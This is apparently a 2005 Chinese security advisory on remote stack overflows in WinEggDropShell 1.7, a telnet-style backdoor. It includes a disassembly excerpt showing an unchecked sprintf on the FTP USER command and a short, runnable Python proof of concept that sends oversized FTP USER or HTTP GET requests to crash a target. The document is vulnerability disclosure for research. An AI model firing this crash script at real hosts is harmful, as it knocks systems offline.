发布日期：2005-12-02
更新日期：2005-12-02

受影响系统：

WinEggDropShell WinEggDropShell 1.7

描述：

---

BUGTRAQ  ID: 15682

WinEggDropShell是一款流行的支持中文的telnet类型后门程序。

WinEggDropShell中存在多个远程溢出漏洞，远程攻击者可能利用漏洞在安装了此后门的服务器上执行任意指令。

主要漏洞如下：

1. FTP USER溢出

.text:100027BD                 push    offset aUser    ; "USER"
.text:100027C2                 call    _strlen
.text:100027C7                 add     esp, 4
.text:100027CA                 lea     edi, [ebp+eax-103h]
.text:100027D1                 push    edi
.text:100027D2                 push    offset aS       ; "%s"
.text:100027D7                 lea     edi, [ebp+var_208]
.text:100027DD                 push    edi             ; char *
.text:100027DE                 call    _sprintf        ; emmmmm, ;)

_ReceiveSocketBuffer最多能接收0x200h，但[ebp+var_208]仅为0x104h大小的缓冲区。

2. FTP Server绕过命令
   .............

3. HTTP GET栈溢出
   GET /A*260

成功利用这些漏洞的攻击者可以在目标系统上执行任意代码，或导致蓝屏。

<*来源：Sowhat （smaillist@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113358915425708&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET"  && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11

# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo

import sys
import string
import socket

if (len(sys.argv) != 4):
    
    print "##########################################################################"
    print "#      WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC         #"
    print "#          This Poc will BOD the vulnerable target                       #"
    print "#          Bug Discoverd and coded  by Sowhat                            #"
    print "#                 http://secway.org                                      #"
    print "##########################################################################"
    print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
    print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
    print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
    sys.exit(0)

host = sys.argv[2]
port = string.atoi(sys.argv[3])

if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):

        request = "USER " + 'A'*512 + "\r"

if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):

        request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"

exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)

建议：

---

厂商补丁：

WinEggDropShell
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。

浏览次数：3224
严重程度：0（网友投票）